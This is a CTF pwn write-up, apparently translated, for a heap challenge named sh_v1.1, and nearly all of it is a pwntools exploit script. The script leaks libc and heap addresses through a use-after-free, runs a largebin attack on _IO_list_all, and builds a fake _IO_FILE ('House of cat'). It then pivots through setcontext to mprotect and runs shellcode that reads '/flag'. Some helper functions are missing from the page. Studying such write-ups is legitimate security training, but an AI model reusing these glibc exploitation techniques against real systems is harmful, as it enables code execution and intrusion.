「Pwn」Pwn March Pwn Writeup WP Reproduction
sh_v1.1
The challenge implements some shell functionalities, but I really didn't understand the logic behind them. However, it's just obfuscation, so it doesn't matter.
This is an individual competition, but I have already forgotten things related to Web or Rev, let alone Crypto. Meanwhile, we cannot solve the hard challenges, so uh-hum, let's just say I'm not participating for the sake of the ranks LOL
Getting into jail competition +1
Written before dinner; the rest has not been reproduced yet.
```python
from pwn import *

# The page preserves the script only from the tail of the add() helper onward.
# menu(), delete(), edit(), the process handle `sh` and the `libc` ELF object
# are defined earlier in the original script and are not reproduced here.

def add(size: int, content: bytes, remark: bytes):
    # the first lines of this helper (menu choice and the "Size: " prompt) are
    # cut off on the page; only the content and remark sends survive
    sh.sendafter(b"Content: ", content)
    sh.sendafter(b"Remark: ", remark)

def show(idx: int):
    menu(4)
    sh.sendlineafter(b"Index: ", str(idx).encode())

# Two large chunks; freeing chunk 0 sends it to the unsorted bin, and show()
# still prints it (use-after-free), leaking a main_arena pointer -> libc base.
add(0x460, b'\x00', b'\x00')  # 0
add(0x440, b'\x00', b'\x00')  # 1
delete(0)
show(0)
sh.recvuntil(b"Content: \n")
libc_base = u64(sh.recv(6).ljust(8, b'\x00')) - 0x1ebbe0
largebin_fd = libc_base + 0x1ebfe0
io_list = libc_base + libc.sym['_IO_list_all']
io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
setcontext = libc_base + libc.sym['setcontext']
mprotect = libc_base + libc.sym['mprotect']
print("libc_base >>>", hex(libc_base))

# A larger request sorts chunk 0 into the large bin; overwriting fd/bk with
# 'A's and showing it again leaks fd_nextsize, which is a heap pointer.
menu(1)
sh.sendlineafter(b"Size: ", str(0x480).encode())
edit(0, b'A'*0x10, b'\x00')
show(0)
sh.recvuntil(b'A'*0x10)
heap_base = u64(sh.recv(6).ljust(8, b'\x00')) - 0x290
print("heap_base >>>", hex(heap_base))

# Largebin attack: corrupt bk_nextsize of the large-bin chunk so that sorting
# chunk 1 out of the unsorted bin writes a heap address over _IO_list_all.
edit(0, p64(largebin_fd)*2 + p64(heap_base + 0x290) + p64(io_list-0x20), b'\x00')
delete(1)
menu(1)
sh.sendlineafter(b"Size: ", str(0x480).encode())

# House of cat
fake_io_addr = heap_base + 0xb70  # address of the fake _IO_FILE structure
fake_IO_FILE = p64(0)
fake_IO_FILE += p64(0) * 5
fake_IO_FILE += p64(1) + p64(2)  # rcx != 0 (FSOP)
fake_IO_FILE += p64(heap_base + 0xfc0 - 0x50)  # _IO_backup_base = rdx
fake_IO_FILE += p64(setcontext+61)  # _IO_save_end = call addr (call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
fake_IO_FILE += p64(0)  # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
fake_IO_FILE += p64(heap_base+0x1000)  # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)  # _wide_data, rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(1)  # mode = 1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(io_wfile_jumps+0x30)  # vtable inside _IO_wfile_jumps (the page's comment says +0x10; the code uses +0x30)
fake_IO_FILE += p64(0) * 6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr

# Shellcode run after mprotect: the two int 0x80 calls use 32-bit syscall
# numbers (mmap2 = 0xc0, open = 5); the syscall instructions use 64-bit ones.
shellcode = asm(
'''
mov rax, 0xc0
mov rbx, 0x500000
mov rcx, 0x5000
mov rdx, 3
mov rsi, 0x100021
xor rdi, rdi
xor rbp, rbp
int 0x80            # mmap2(0x500000, 0x5000, 3, 0x100021, 0, 0)
mov rdi, 0
mov rsi, 0x502000
mov rdx, 0x100
xor rax, rax
syscall             # read(0, 0x502000, 0x100): file name sent below
mov rax, 5
mov rbx, 0x502000
xor rcx, rcx
xor rdx, rdx
int 0x80            # open(0x502000, 0, 0)
mov rdi, rax
mov rsi, 0x503000
mov rdx, 0x100
xor rax, rax
syscall             # read(fd, 0x503000, 0x100)
mov rdi, 1
mov rax, 1
syscall             # write(1, 0x503000, 0x100)
''', arch='amd64')

# Register file consumed by setcontext+61: rdi rsi rdx rsp rcx(retn_addr);
# it calls mprotect(heap_base+0x1000, 0x2000, 7) and returns into the shellcode.
payload = p64(0) + p64(heap_base+0x1000) + p64(0x2000) + p64(0)*2 + p64(7) + p64(0)*2 + p64(heap_base+0x1020) + p64(mprotect) + p64(heap_base+0x1028) + shellcode
edit(1, fake_IO_FILE, payload)

# debugging aids from the original script; drop them for a non-interactive run
gdb.attach(sh, 'b *mprotect')
pause()

# exiting flushes the _IO_list_all chain and fires the fake _IO_FILE
menu(5)
sh.send(b'/flag\x00')
sh.interactive()
```